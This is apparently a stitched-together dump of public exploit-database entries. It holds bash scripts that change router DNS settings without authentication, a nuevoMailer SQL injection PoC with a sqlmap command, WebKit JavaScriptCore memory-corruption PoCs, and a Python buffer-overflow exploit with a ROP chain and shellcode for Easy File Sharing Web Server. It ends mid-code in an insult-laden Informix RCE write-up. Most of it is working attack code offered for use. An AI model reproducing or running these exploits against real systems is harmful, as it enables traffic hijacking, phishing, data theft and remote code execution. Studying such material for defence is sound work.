echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
#!/bin/bash
#
# UTstarcom WA3002G4
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " UTstarcom WA3002G4 "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
# Exploit Title: nuevoMailer version 6.0 and earlier time-based SQL Injection
# Exploit Author: ALEH BOITSAU
# Google Dork: inurl:/inc/rdr.php?
# Date: 2017-06-09
# Vendor Homepage: https://www.nuevomailer.com/
# Version: 6.0 and earlier
# Tested on: Linux
# CVE: CVE-2017-9730
Description: SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier
allows remote attackers to execute arbitrary SQL commands via the "r" parameter.
PoC:
https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556[time based SQL INJ]
https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+
sqlmap -u "http://vulnerable_site.com/inc/rdr.php?r=120c44c5" --dbms=mysql -p r --tamper=equaltolike,between --hostname --technique=T -v 3 --random-agent --time-sec=4
NB: "equaltolike" and "between" arsenal to defeat filtering! Data retrieval process may take more than usual time.
Disclosure Timeline:
2017-06-09: Vendor has been notified
2017-06-09: Vendor responded with intention to fix the vulnerability
2017-06-16: CVE number acquired
2017-06-16: Public disclosure
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1229
Here's tryCreateArrayButterfly which is invoked from intlObjectFuncGetCanonicalLocales to create a JSArray object.
inline Butterfly* tryCreateArrayButterfly(VM& vm, JSCell* intendedOwner, unsigned initialLength)
{
Butterfly* butterfly = Butterfly::tryCreate(
vm, intendedOwner, 0, 0, true, baseIndexingHeaderForArrayStorage(initialLength),
ArrayStorage::sizeFor(BASE_ARRAY_STORAGE_VECTOR_LEN));
if (!butterfly)
return nullptr;
ArrayStorage* storage = butterfly->arrayStorage();
storage->m_sparseMap.clear();
storage->m_indexBias = 0;
storage->m_numValuesInVector = 0;
return butterfly;
}
It allocates a fixed size(BASE_ARRAY_STORAGE_VECTOR_LEN) of memory without caring about |initialLength|. So a BOF occurs in the following iteration.
EncodedJSValue JSC_HOST_CALL intlObjectFuncGetCanonicalLocales(ExecState* state)
{
...
auto length = localeList.size();
for (size_t i = 0; i < length; ++i) {
localeArray->initializeIndex(vm, i, jsString(state, localeList[i]));
RETURN_IF_EXCEPTION(scope, encodedJSValue());
}
...
}
PoC:
-->
Object.prototype.__defineGetter__(1000, () => 2);
let locales = ['mr', 'bs', 'ee-TG', 'ms', 'kam-KE', 'mt', 'ha', 'es-HN', 'ml-IN', 'ro-MD', 'kab-DZ', 'he', 'es-CO', 'my', 'es-PA', 'az-Latn', 'mer', 'en-NZ', 'xog-UG', 'sg', 'fr-GP', 'sr-Cyrl-BA', 'hi', 'fil-PH', 'lt-LT', 'si', 'en-MT', 'si-LK', 'luo-KE', 'it-CH', 'teo', 'mfe', 'sk', 'uz-Cyrl-UZ', 'sl', 'rm-CH', 'az-Cyrl-AZ', 'fr-GQ', 'kde', 'sn', 'cgg-UG', 'so', 'fr-RW', 'es-SV', 'mas-TZ', 'en-MU', 'sq', 'hr', 'sr', 'en-PH', 'ca', 'hu', 'mk-MK', 'fr-TD', 'nb', 'sv', 'kln-KE', 'sw', 'nd', 'sr-Latn', 'el-GR', 'hy', 'ne', 'el-CY', 'es-CR', 'fo-FO', 'pa-Arab-PK', 'seh', 'ar-YE', 'ja-JP', 'ur-PK', 'pa-Guru', 'gl-ES', 'zh-Hant-HK', 'ar-EG', 'nl', 'th-TH', 'es-PE', 'fr-KM', 'nn', 'kk-Cyrl-KZ', 'kea', 'lv-LV', 'kln', 'tzm-Latn', 'yo', 'gsw-CH', 'ha-Latn-GH', 'is-IS', 'pt-BR', 'cs', 'en-PK', 'fa-IR', 'zh-Hans-SG', 'luo', 'ta', 'fr-TG', 'kde-TZ', 'mr-IN', 'ar-SA', 'ka-GE', 'mfe-MU', 'id', 'fr-LU', 'de-LU', 'ru-MD', 'cy', 'zh-Hans-HK', 'te', 'bg-BG', 'shi-Latn', 'ig', 'ses', 'ii', 'es-BO', 'th', 'ko-KR', 'ti', 'it-IT', 'shi-Latn-MA', 'pt-MZ', 'ff-SN', 'haw', 'zh-Hans', 'so-KE', 'bn-IN', 'en-UM', 'to', 'id-ID', 'uz-Cyrl', 'en-GU', 'es-EC', 'en-US-posix', 'sr-Latn-BA', 'is', 'luy', 'tr', 'en-NA', 'it', 'da', 'bo-IN', 'vun-TZ', 'ar-SD', 'uz-Latn-UZ', 'az-Latn-AZ', 'de', 'es-GQ', 'ta-IN', 'de-DE', 'fr-FR', 'rof-TZ', 'ar-LY', 'en-BW', 'asa', 'zh', 'ha-Latn', 'fr-NE', 'es-MX', 'bem-ZM', 'zh-Hans-CN', 'bn-BD', 'pt-GW', 'om', 'jmc', 'de-AT', 'kk-Cyrl', 'sw-TZ', 'ar-OM', 'et-EE', 'or', 'da-DK', 'ro-RO', 'zh-Hant', 'bm-ML', 'ja', 'fr-CA', 'naq', 'zu', 'en-IE', 'ar-MA', 'es-GT', 'uz-Arab-AF', 'en-AS', 'bs-BA', 'am-ET', 'ar-TN', 'haw-US', 'ar-JO', 'fa-AF', 'uz-Latn', 'en-BZ', 'nyn-UG', 'ebu-KE', 'te-IN', 'cy-GB', 'uk', 'nyn', 'en-JM', 'en-US', 'fil', 'ar-KW', 'af-ZA', 'en-CA', 'fr-DJ', 'ti-ER', 'ig-NG', 'en-AU', 'ur', 'fr-MC', 'pt-PT', 'pa', 'es-419', 'fr-CD', 'en-SG', 'bo-CN', 'kn-IN', 'sr-Cyrl-RS', 'lg-UG', 'gu-IN', 'ee', 'nd-ZW', 'bem', 'uz', 'sw-KE', 'sq-AL', 'hr-HR', 'mas-KE', 'el', 'ti-ET', 'es-AR', 'pl', 'en', 'eo', 'shi', 'kok', 'fr-CF', 'fr-RE', 'mas', 'rof', 'ru-UA', 'yo-NG', 'dav-KE', 'gv-GB', 'pa-Arab', 'es', 'teo-UG', 'ps', 'es-PR', 'fr-MF', 'et', 'pt', 'eu', 'ka', 'rwk-TZ', 'nb-NO', 'fr-CG'];
Intl.getCanonicalLocales(locales);
#!/bin/bash
#
# iBall Baton iB-WRA150N
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " iBall Baton iB-WRA150N "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1220
When compiling Javascript code into machine code, bound checks for all accesses to a typed array are also inserted. These bound checks are re-optimized and the unnecessary checks are removed, which is performed by IntegerCheckCombiningPhase::handleBlock.
For example, when the following JavaScript code is compiled, there are all bound checks for 8, 5, 2, but after the optimization, the checks for 5 and 2 are removed, and the only check for 8 will remain.
function f() {
let arr = new Uint32Array(10);
for (let i = 0; i < 0x100000; i++) {
parseInt();
}
arr[8] = 1;
arr[5] = 2;
arr[2] = 3;
}
f();
Note: parseInt is for forcing to start the JIT optimization.
Here's a snippet IntegerCheckCombiningPhase::handleBlock.
void handleBlock(BlockIndex blockIndex)
{
...
if (range.m_count) {
if (data.m_addend > range.m_maxBound) {
range.m_maxBound = data.m_addend;
range.m_maxOrigin = node->origin.semantic;
} else if (data.m_addend < range.m_minBound) {
range.m_minBound = data.m_addend;
range.m_minOrigin = node->origin.semantic;
}
...
}
The problem is that the check |data.m_addend > range.m_maxBound| is a signed comparison.
PoC:
-->
function f() {
let arr = new Uint32Array(10);
for (let i = 0; i < 0x100000; i++) {
parseInt();
}
arr[8] = 1;
arr[-0x12345678] = 2;
}
f();
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1218&desc=2
Here's a snippet of arrayProtoFuncSplice.
EncodedJSValue JSC_HOST_CALL arrayProtoFuncSplice(ExecState* exec)
{
...
result = JSArray::tryCreateForInitializationPrivate(vm, exec->lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(ArrayWithUndecided), actualDeleteCount);
if (!result)
return JSValue::encode(throwOutOfMemoryError(exec, scope));
for (unsigned k = 0; k < actualDeleteCount; ++k) {
JSValue v = getProperty(exec, thisObj, k + actualStart);
RETURN_IF_EXCEPTION(scope, encodedJSValue());
if (UNLIKELY(!v)) {
continue;
}
result->initializeIndex(vm, k, v);
}
...
}
|JSArray::tryCreateForInitializationPrivate| will return an uninitialized JSArray. So the next routine must clear its all indices. But the routine skips holes in |thisObj|. This is fine under normal circumstances because the type of |result| will be ArrayWithUndecided, unless you're having a bad time. We can force |result|'s type to ArrayWithSlowPutArrayStorage by using |JSGlobalObject::haveABadTime|.
PoC:
-->
function gc() {
for (let i = 0; i < 0x10; i++)
new ArrayBuffer(0x1000000);
}
Array.prototype.__defineGetter__(0x1000, () => 1);
gc();
for (let i = 0; i < 0x100; i++) {
new Array(0x100).fill(1234.5678);
}
gc();
print(new Array(0x100).splice(0));
#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass with ROP)
# Exploit Author: bl4ck h4ck3r
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: Easy File Sharing Web Server v7.2
# Tested on: Windows XP SP2, Windows 2008 R2 x64
import socket
import struct
import sys
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <host>\n"
exit()
# 0x1002280a : # ADD ESP,1004 # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
ret = struct.pack("<I", 0x1002280a)
# nopsled
shellcode = "\x90"*200
# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python
shellcode += "\x89\xe7\xd9\xec\xd9\x77\xf4\x5d\x55\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x39\x6c\x5a\x48\x6b\x32\x55\x50\x67\x70\x47\x70"
shellcode += "\x75\x30\x6e\x69\x78\x65\x65\x61\x39\x50\x31\x74"
shellcode += "\x4c\x4b\x50\x50\x46\x50\x4c\x4b\x36\x32\x36\x6c"
shellcode += "\x6c\x4b\x66\x32\x42\x34\x6c\x4b\x52\x52\x77\x58"
shellcode += "\x54\x4f\x4c\x77\x63\x7a\x31\x36\x66\x51\x4b\x4f"
shellcode += "\x4e\x4c\x47\x4c\x73\x51\x73\x4c\x76\x62\x76\x4c"
shellcode += "\x51\x30\x59\x51\x78\x4f\x46\x6d\x76\x61\x48\x47"
shellcode += "\x6a\x42\x79\x62\x50\x52\x50\x57\x4c\x4b\x63\x62"
shellcode += "\x36\x70\x4e\x6b\x30\x4a\x37\x4c\x6e\x6b\x42\x6c"
shellcode += "\x42\x31\x33\x48\x49\x73\x50\x48\x33\x31\x6a\x71"
shellcode += "\x42\x71\x4c\x4b\x63\x69\x47\x50\x45\x51\x4a\x73"
shellcode += "\x6c\x4b\x72\x69\x44\x58\x6b\x53\x67\x4a\x42\x69"
shellcode += "\x6e\x6b\x45\x64\x4c\x4b\x46\x61\x6b\x66\x35\x61"
shellcode += "\x39\x6f\x6c\x6c\x6b\x71\x58\x4f\x34\x4d\x46\x61"
shellcode += "\x6b\x77\x44\x78\x6d\x30\x71\x65\x59\x66\x64\x43"
shellcode += "\x61\x6d\x48\x78\x67\x4b\x61\x6d\x74\x64\x32\x55"
shellcode += "\x4d\x34\x42\x78\x6e\x6b\x32\x78\x44\x64\x56\x61"
shellcode += "\x68\x53\x62\x46\x4e\x6b\x36\x6c\x70\x4b\x4c\x4b"
shellcode += "\x56\x38\x35\x4c\x56\x61\x59\x43\x6c\x4b\x76\x64"
shellcode += "\x4c\x4b\x56\x61\x78\x50\x6e\x69\x61\x54\x37\x54"
shellcode += "\x55\x74\x53\x6b\x63\x6b\x63\x51\x32\x79\x71\x4a"
shellcode += "\x36\x31\x69\x6f\x4b\x50\x43\x6f\x31\x4f\x73\x6a"
shellcode += "\x6e\x6b\x36\x72\x58\x6b\x4c\x4d\x53\x6d\x52\x4a"
shellcode += "\x47\x71\x4c\x4d\x6f\x75\x48\x32\x43\x30\x53\x30"
shellcode += "\x67\x70\x32\x70\x31\x78\x34\x71\x4e\x6b\x32\x4f"
shellcode += "\x6c\x47\x39\x6f\x68\x55\x4f\x4b\x4c\x30\x68\x35"
shellcode += "\x4f\x52\x33\x66\x50\x68\x79\x36\x5a\x35\x6d\x6d"
shellcode += "\x4d\x4d\x49\x6f\x68\x55\x55\x6c\x76\x66\x53\x4c"
shellcode += "\x75\x5a\x6b\x30\x59\x6b\x59\x70\x72\x55\x33\x35"
shellcode += "\x6f\x4b\x37\x37\x76\x73\x74\x32\x70\x6f\x50\x6a"
shellcode += "\x67\x70\x50\x53\x59\x6f\x69\x45\x65\x33\x75\x31"
shellcode += "\x62\x4c\x61\x73\x46\x4e\x75\x35\x30\x78\x72\x45"
shellcode += "\x45\x50\x41\x41"
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
# 0x00000000, # [-] Unable to find gadget to put 00000201 into ebx
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0xFFFFFDFE, # -202
0x100231d1, # NEG EAX # RETN [ImageLoad.dll]
0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]| {PAGE_EXECUTE_READ}
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0x1004de84, # &Writable location [ImageLoad.dll]
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll]
0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
0x61c0a798, # XCHG EAX,EDI # RETN [sqlite3.dll]
0x1001d626, # XOR ESI,ESI # RETN [ImageLoad.dll]
0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
0x100218f9, # POP EBP # RETN [ImageLoad.dll]
0x61c24169, # & push esp # ret [sqlite3.dll]
0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x1001bd98, # POP ECX # RETN [ImageLoad.dll]
0x1004de84, # &Writable location [ImageLoad.dll]
0x61c373a4, # POP EDI # RETN [sqlite3.dll]
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0x90909090, # nop
0x100240c2, # PUSHAD # RETN [ImageLoad.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
buf = "A"*2278 + rop_chain + shellcode + "B"*(1794-len(shellcode)-len(rop_chain)) + ret
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send("POST /sendemail.ghp HTTP/1.1\r\n\r\nEmail=" + buf + "&getPassword=Get+Password")
s.close()
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1208
After JSGlobalObject::haveABadTime is called, the type of all JavaScript arrays(including newly created arrays) are of the same type: ArrayWithSlowPutArrayStorage. But (of course) this only affects objects that share the same JSGlobalObject. So arrays come from another JSGlobalObject can cause type confusions.
void JSGlobalObject::haveABadTime(VM& vm)
{
...
for (unsigned i = 0; i < NumberOfIndexingShapes; ++i)
m_arrayStructureForIndexingShapeDuringAllocation[i].set(vm, this, originalArrayStructureForIndexingType(ArrayWithSlowPutArrayStorage)); <<-- The type of a newly created array will be ArrayWithSlowPutArrayStorage
...
while (!foundObjects.isEmpty()) {
JSObject* object = asObject(foundObjects.last());
foundObjects.removeLast();
ASSERT(hasBrokenIndexing(object));
object->switchToSlowPutArrayStorage(vm); <<------ switch type of an old array
}
}
1. fastSlice:
JSArray* JSArray::fastSlice(ExecState& exec, unsigned startIndex, unsigned count)
{
auto arrayType = indexingType();
switch (arrayType) {
case ArrayWithDouble:
case ArrayWithInt32:
case ArrayWithContiguous: {
VM& vm = exec.vm();
if (count >= MIN_SPARSE_ARRAY_INDEX || structure(vm)->holesMustForwardToPrototype(vm))
return nullptr;
Structure* resultStructure = exec.lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(arrayType);
JSArray* resultArray = JSArray::tryCreateForInitializationPrivate(vm, resultStructure, count);
if (!resultArray)
return nullptr;
auto& resultButterfly = *resultArray->butterfly();
if (arrayType == ArrayWithDouble)
memcpy(resultButterfly.contiguousDouble().data(), m_butterfly.get()->contiguousDouble().data() + startIndex, sizeof(JSValue) * count);
else
memcpy(resultButterfly.contiguous().data(), m_butterfly.get()->contiguous().data() + startIndex, sizeof(JSValue) * count);
resultButterfly.setPublicLength(count);
return resultArray;
}
default:
return nullptr;
}
}
If |this| came from another JSGlobalObject, and |haveABadTime| was called, the type of |resultArray| will be ArrayWithSlowPutArrayStorage. It will result in a type confusion.
<html>
<body>
<script>
Array.prototype.__defineGetter__(100, () => 1);
let f = document.body.appendChild(document.createElement('iframe'));
let a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320);
let c = Array.prototype.slice.call(a);
alert(c);
</script>
</body>
</html>
2. arrayProtoPrivateFuncConcatMemcpy
EncodedJSValue JSC_HOST_CALL arrayProtoPrivateFuncConcatMemcpy(ExecState* exec)
{
...
JSArray* firstArray = jsCast<JSArray*>(exec->uncheckedArgument(0));
...
IndexingType type = firstArray->mergeIndexingTypeForCopying(secondType);
...
Structure* resultStructure = exec->lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(type);
JSArray* result = JSArray::tryCreateForInitializationPrivate(vm, resultStructure, firstArraySize + secondArraySize);
if (!result)
return JSValue::encode(throwOutOfMemoryError(exec, scope));
if (type == ArrayWithDouble) {
double* buffer = result->butterfly()->contiguousDouble().data();
memcpy(buffer, firstButterfly->contiguousDouble().data(), sizeof(JSValue) * firstArraySize);
memcpy(buffer + firstArraySize, secondButterfly->contiguousDouble().data(), sizeof(JSValue) * secondArraySize);
} else if (type != ArrayWithUndecided) {
WriteBarrier<Unknown>* buffer = result->butterfly()->contiguous().data();
memcpy(buffer, firstButterfly->contiguous().data(), sizeof(JSValue) * firstArraySize);
if (secondType != ArrayWithUndecided)
memcpy(buffer + firstArraySize, secondButterfly->contiguous().data(), sizeof(JSValue) * secondArraySize);
else {
for (unsigned i = secondArraySize; i--;)
buffer[i + firstArraySize].clear();
}
}
result->butterfly()->setPublicLength(firstArraySize + secondArraySize);
return JSValue::encode(result);
}
If |firstArray| came from another JSGlobalObject, and |haveABadTime| was called, the type of |result| will be ArrayWithSlowPutArrayStorage. It will result in a type confusion.
PoC:
-->
<html>
<body>
<script>
Array.prototype.__defineGetter__(100, () => 1);
let f = document.body.appendChild(document.createElement('iframe'));
let a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320);
let b = new f.contentWindow.Array(2.3023e-320, 2.3023e-320);
let c = Array.prototype.concat.call(a, b);
alert(c);
</script>
</body>
</html>
#!/usr/local/bin/python
"""
IBM Informix Dynamic Server doconfig PHP Code Injection Remote Code Execution Vulnerability (0DAY)
Bonus: free XXE bug included!
Download: https://www-01.ibm.com/marketing/iwm/iwm/web/reg/download.do?source=swg-informixfpd&S_PKG=dl&lang=en_US&cp=UTF-8&dlmethod=http
Twitter: https://twitter.com/rgod777
Found by: IMgod aka rgay
About:
~~~~~~
So after Andrea Micalizzi decided to audit this software and found some bugs I decided to audit it too. (see https://blogs.securiteam.com/index.php/archives/3210)
What's that? Where is all your main frame, super 1337 hacks now rgod? Why did you miss these 3 bugs?
- unauthed XXE
- unauthed SQLi
- unauthed RCE
Your ub3r 31337 PHP hacks are soooooooooooo cool, maybe you should commit seppuku again. Or maybe you should have taken one of the 143 jobs you were offered? Cos I'm about to rekt dis cunt.
Vulnerable Code:
~~~~~~~~~~~~~~~~
Of course, rgod misses this bug in openadmin/admin/index.php:
$admin->run(); // 1. calls run()
$idsadmin->html->render();
function run()
{
if ( isset ( $this->idsadmin->in['helpact'] )
&& $this->idsadmin->in['do'] != "doedithelp"
&& $this->idsadmin->in['do'] != "doaddhelp" )
{
